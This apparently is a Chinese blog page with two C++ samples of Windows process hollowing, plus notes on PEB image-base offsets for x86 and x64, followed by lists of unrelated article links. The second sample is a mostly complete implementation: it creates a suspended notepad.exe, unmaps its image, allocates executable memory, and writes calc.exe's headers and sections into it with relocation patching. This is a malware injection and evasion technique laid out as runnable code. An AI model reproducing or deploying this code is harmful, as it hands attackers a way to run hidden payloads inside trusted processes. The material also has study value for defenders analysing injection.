#include <iostream>

#include <Windows.h>

#include <winternl.h>

#include <tchar.h>

#pragma comment(lib, "ntdll")

int main()

{

    // create destination process - this is the process to be hollowed out

    LPSTARTUPINFOA si = new STARTUPINFOA();

    LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();

    PROCESS_BASIC_INFORMATION* pbi = new PROCESS_BASIC_INFORMATION();

    ULONG returnLenght = 0;

    CreateProcessA(NULL, (LPSTR)"c:\\windows\\system32\\calc.exe", NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, si, pi);

    HANDLE destProcess = pi->hProcess;

    // get destination imageBase offset address from the PEB

    NtQueryInformationProcess(destProcess, ProcessBasicInformation, pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLenght);

    ULONG_PTR  pebImageBaseOffset = (ULONG_PTR)pbi->PebBaseAddress + 8; //如果是在x64,则改成16

    // get destination imageBaseAddress

    LPVOID destImageBase = 0;

    SIZE_T bytesRead = NULL;

    ReadProcessMemory(destProcess, (LPCVOID)pebImageBaseOffset, &destImageBase, sizeof(ULONG_PTR), &bytesRead); 
    std::cout << "pebImageBaseOffset is: " << destImageBase << std::endl; std::cin.get(); 
}

因为PebBaseAddress在x86下是指向PEB+8,在x64下是指向PEB+16

具体的结构体:

typedef struct _PEB {

    BYTE Reserved1[2]; //2个字节

    BYTE BeingDebugged; //1个字节

    BYTE Reserved2[1]; //1个字节

    PVOID Reserved3[2];

    PPEB_LDR_DATA Ldr;

    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;

    PVOID Reserved4[3];

    PVOID AtlThunkSListPtr;

    PVOID Reserved5;

    ULONG Reserved6;

    PVOID Reserved7;

    ULONG Reserved8;

    ULONG AtlThunkSListPtr32;

    PVOID Reserved9[45];

    BYTE Reserved10[96];

    PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;

    BYTE Reserved11[128];

    PVOID Reserved12[1];

    ULONG SessionId;

} PEB, *PPEB;

如果在x86下,则是以4字节对齐,那么偏移8才能指向Reserved3[1]

在x64下,则是以8字节对齐,那么只有偏移16才能指向Reserved3[1]

可以看这个链接:https://blog.csdn.net/v2x222/article/details/71082150 (ImageBaseAddress : Ptr32 Void  and +0x010 ImageBaseAddress : Ptr64 Void)

第二个sample:

#include <iostream>

#include <Windows.h>

#include <winternl.h>

#pragma comment(lib, "ntdll")

using NtUnmapViewOfSection = NTSTATUS(WINAPI*)(HANDLE, PVOID);

typedef struct BASE_RELOCATION_BLOCK {

    DWORD PageAddress;

    DWORD BlockSize;

} BASE_RELOCATION_BLOCK, * PBASE_RELOCATION_BLOCK;

typedef struct BASE_RELOCATION_ENTRY {

    USHORT Offset : 12;

    USHORT Type : 4;

} BASE_RELOCATION_ENTRY, * PBASE_RELOCATION_ENTRY;

int main()

{

    // create destination process - this is the process to be hollowed out

    LPSTARTUPINFOA si = new STARTUPINFOA();

    LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();

    PROCESS_BASIC_INFORMATION* pbi = new PROCESS_BASIC_INFORMATION();

    ULONG returnLenght = 0;

    CreateProcessA(NULL, (LPSTR)"c:\\windows\\syswow64\\notepad.exe", NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, si, pi);

    HANDLE destProcess = pi->hProcess;

    // get destination imageBase offset address from the PEB

    NtQueryInformationProcess(destProcess, ProcessBasicInformation, pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLenght);

    ULONG_PTR pebImageBaseOffset = (ULONG_PTR)pbi->PebBaseAddress + 16;

    // get destination imageBaseAddress

    LPVOID destImageBase = 0;

    SIZE_T bytesRead = NULL;

    ReadProcessMemory(destProcess, (LPCVOID)pebImageBaseOffset, &destImageBase, sizeof(ULONG_PTR), &bytesRead);

    // read source file - this is the file that will be executed inside the hollowed process

    HANDLE sourceFile = CreateFileA("c:\\windows\\system32\\calc.exe", GENERIC_READ, NULL, NULL, OPEN_ALWAYS, NULL, NULL);

    ULONG_PTR sourceFileSize = GetFileSize(sourceFile, NULL);

    SIZE_T fileBytesRead = 0;

    LPVOID sourceFileBytesBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sourceFileSize);

    ReadFile(sourceFile, sourceFileBytesBuffer, sourceFileSize, NULL, NULL);

    // get source image size

    PIMAGE_DOS_HEADER sourceImageDosHeaders = (PIMAGE_DOS_HEADER)sourceFileBytesBuffer;

    PIMAGE_NT_HEADERS sourceImageNTHeaders = (PIMAGE_NT_HEADERS)((ULONG_PTR)sourceFileBytesBuffer + sourceImageDosHeaders->e_lfanew);

    SIZE_T sourceImageSize = sourceImageNTHeaders->OptionalHeader.SizeOfImage;

    // carve out the destination image

    NtUnmapViewOfSection myNtUnmapViewOfSection = (NtUnmapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtUnmapViewOfSection"));

    myNtUnmapViewOfSection(destProcess, destImageBase);

    // allocate new memory in destination image for the source image

    LPVOID newDestImageBase = VirtualAllocEx(destProcess, destImageBase, sourceImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    destImageBase = newDestImageBase;

    // get delta between sourceImageBaseAddress and destinationImageBaseAddress

    ULONG_PTR deltaImageBase = (ULONG_PTR)destImageBase - sourceImageNTHeaders->OptionalHeader.ImageBase;

    // set sourceImageBase to destImageBase and copy the source Image headers to the destination image

    sourceImageNTHeaders->OptionalHeader.ImageBase = (ULONG_PTR)destImageBase;

    WriteProcessMemory(destProcess, newDestImageBase, sourceFileBytesBuffer, sourceImageNTHeaders->OptionalHeader.SizeOfHeaders, NULL);

    // get pointer to first source image section

    PIMAGE_SECTION_HEADER sourceImageSection = (PIMAGE_SECTION_HEADER)((ULONG_PTR)sourceFileBytesBuffer + sourceImageDosHeaders->e_lfanew + sizeof(_IMAGE_NT_HEADERS64)); //IMAGE_NT_HEADERS32

    PIMAGE_SECTION_HEADER sourceImageSectionOld = sourceImageSection;

    // copy source image sections to destination

    for (int i = 0; i < sourceImageNTHeaders->FileHeader.NumberOfSections; i++)

    {

        PVOID destinationSectionLocation = (PVOID)((ULONG_PTR)destImageBase + sourceImageSection->VirtualAddress);

        PVOID sourceSectionLocation = (PVOID)((ULONG_PTR)sourceFileBytesBuffer + sourceImageSection->PointerToRawData);

        WriteProcessMemory(destProcess, destinationSectionLocation, sourceSectionLocation, sourceImageSection->SizeOfRawData, NULL);

        sourceImageSection++;

    }

    // get address of the relocation table

    IMAGE_DATA_DIRECTORY relocationTable = sourceImageNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];

    // patch the binary with relocations

    sourceImageSection = sourceImageSectionOld;

    for (int i = 0; i < sourceImageNTHeaders->FileHeader.NumberOfSections; i++)

    {

        BYTE* relocSectionName = (BYTE*)".reloc";

        if (memcmp(sourceImageSection->Name, relocSectionName, 5) != 0)

        {

            sourceImageSection++;

            continue;

        }

        ULONG_PTR sourceRelocationTableRaw = sourceImageSection->PointerToRawData;

        ULONG_PTR relocationOffset = 0;

        while (relocationOffset < relocationTable.Size) {

            PBASE_RELOCATION_BLOCK relocationBlock = (PBASE_RELOCATION_BLOCK)((ULONG_PTR)sourceFileBytesBuffer + sourceRelocationTableRaw + relocationOffset);

            relocationOffset += sizeof(BASE_RELOCATION_BLOCK);

            ULONG_PTR relocationEntryCount = (relocationBlock->BlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);

            PBASE_RELOCATION_ENTRY relocationEntries = (PBASE_RELOCATION_ENTRY)((ULONG_PTR)sourceFileBytesBuffer + sourceRelocationTableRaw + relocationOffset);

            for (ULONG_PTR y = 0; y < relocationEntryCount; y++)

            {

                relocationOffset += sizeof(BASE_RELOCATION_ENTRY);

                if (relocationEntries[y].Type == 0)

                {

                    continue;

                }

                ULONG_PTR patchAddress = relocationBlock->PageAddress + relocationEntries[y].Offset;

                ULONG_PTR patchedBuffer = 0;

                ReadProcessMemory(destProcess, (LPCVOID)((ULONG_PTR)destImageBase + patchAddress), &patchedBuffer, sizeof(ULONG_PTR), &bytesRead);

                patchedBuffer += deltaImageBase;

                WriteProcessMemory(destProcess, (PVOID)((ULONG_PTR)destImageBase + patchAddress), &patchedBuffer, sizeof(ULONG_PTR), &fileBytesRead);

            }

        }

    }

    return 0;

}

win32-ReadProcessMemory在x86和x64下运行的更多相关文章

  1. VS2012在win7 64位机中x86和x64下基本类型的占用空间大小(转)

    VS2012在win7 64位机中x86和x64下基本类型的占用空间大小 #include "stdafx.h" #include <windows.h> int _t ...

  2. x86和x64下指针的大小

    根据测试 int main() { ; )); )); int n1 = sizeof(a); int n2 = sizeof(p); // int n3 = sizeof(*p); error in ...

  3. C语言整数类型在X86和X64下的字节大小

    C声明 32位机器(X86) 64位机器(X64) char 1 1 short int 2 2 int 4 4 long int 4 8 long long int 8 8 char * 4 8 f ...

  4. [百度空间] [原]跨平台编程注意事项(二): windows下 x86到x64的移植

    之前转的: 将程序移植到64位Windows 还有自己乱写的一篇: 跨平台编程注意事项(一) 之前对于x64平台的移植都是纸上谈兵,算是前期准备工作, 但起码在写代码时,已经非常注意了.所以现在移植起 ...

  5. X86和X64环境下的基本类型所占用的字节大小

    同样的程序代码,使用Visual Studio 进行编译,当目标平台分别为x86或x64环境时,其编译结果是不同的.在x86环境下,指针都是4个字节的:而在x64环境下,指针都是8字节的.测试代码如下 ...

  6. Windows下x86和x64平台的Inline Hook介绍

    前言 我在之前研究文明6的联网机制并试图用Hook技术来拦截socket函数的时候,熟悉了简单的Inline Hook方法,但是由于之前的方法存在缺陷,所以进行了深入的研究,总结出了一些有关Windo ...

  7. (转载)用VS2012或VS2013在win7下编写的程序在XP下运行就出现“不是有效的win32应用程序“

    原文地址:http://www.vcerror.com/?p=1483 问题描述: 用VC2013编译了一个程序,在Windows 8.Windows 7(64位.32位)下都能正常运行.但在Win ...

  8. win32和x86以及x64的区别

    本来是知道x86和x64的区别的. 今天突然在VS2008上看到一个win32的选项,一下子懵了,这是什么玩意. 百度之,发现答案 win32是指windows 32位的操作系统,顾名思义是支持32为 ...

  9. 如何让VS2012编写的程序在XP下运行

    Win32主程序需要以下设置 第一步:在工程属性General设置 第二步:在C/C++ Code Generation 设置 第三步:SubSystem 和  Minimum Required Ve ...

  10. Visual Studio中Debug与Release以及x86、x64、Any CPU的区别 &&&& VS中Debug与Release、_WIN32与_WIN64的区别

    本以为这些无关紧要的 Debug与Release以及x86.x64.Any CPU 差点搞死人了. 看了以下博文才后怕,难怪我切换了一下模式,程序就pass了.... 转载: 1.https://ww ...

随机推荐

  1. HotSpare 9361Raid卡热备盘的设置过程

    HotSpare 9361Raid卡热备盘的设置过程 摘要 公司最近一批服务器到位(去年生产) 插满24盘位的 960G 的SSD 的超融合服务器. (硬盘是镁光的 !-_-!) 想着Raid6虽然数 ...

  2. [转帖]【redis】redis各稳定版本特性(更新到6.0版本)

    1.Redis2.6 Redis2.6在2012年正是发布,经历了17个版本,到2.6.17版本,相对于Redis2.4,主要特性如下: 1)服务端支持Lua脚本. 2)去掉虚拟内存相关功能. 3)放 ...

  3. Linux 查询最近占用内存最多的十个进程的方法

    ps -eo rss,pid,user,command --sort -rss | awk '{ hr=$1/1024 ; printf("%13.2f Mb ",hr) } { ...

  4. Docker容器基础入门认知-Cgroup

    在上一篇说完 namespace 给容器技术提供了隔离之后,我们在介绍一下容器的"限制"问题 也许你会好奇,我们不是已经通过 Linux Namespace 给容器创建了一个容器了 ...

  5. 【解决了一个小问题】macbook m2 下交叉编译 musl-gcc 支持的 gozstd 库

    作者:张富春(ahfuzhang),转载时请注明作者和引用链接,谢谢! cnblogs博客 zhihu Github 公众号:一本正经的瞎扯 我的 golang 项目中使用了 gozstd, 在 ma ...

  6. LINQ分组排序后获取每组第一条记录

    当前有一张数据表{Student},包含了如下的字段信息: CREATE TABLE [dbo].[Student]( [Sno] [nchar](7) NOT NULL, [Sname] [ncha ...

  7. ActiveReports报表行号

    =RunningValue(Fields!字段名称.Value, CountDistinct, "矩表分组名称") RunningValue(Fields!区域.Value, Co ...

  8. 微信小程序-behaviors

    什么是 behaviors behaviors 是用于组件间代码共享的特性,类似于一些编程语言中的 "mixins" 每个 behavior 可以包含一组属性,数据,生命周期函数和 ...

  9. ShardingSphere

    目录 1.ShardingSphere分表与分库分表 2.ShardingSphere分库分表查询 3.自定义分片算法实现range查询 4.SPI扩展机制概述 5.stand通过SPI实现range ...

  10. Prompt工程师指南[高阶篇]:对抗性Prompting、主动prompt、ReAct、GraphPrompts、Multimodal CoT Prompting等

    Prompt工程师指南[高阶篇]:对抗性Prompting.主动prompt.ReAct.GraphPrompts.Multimodal CoT Prompting等 1.对抗性 Prompting ...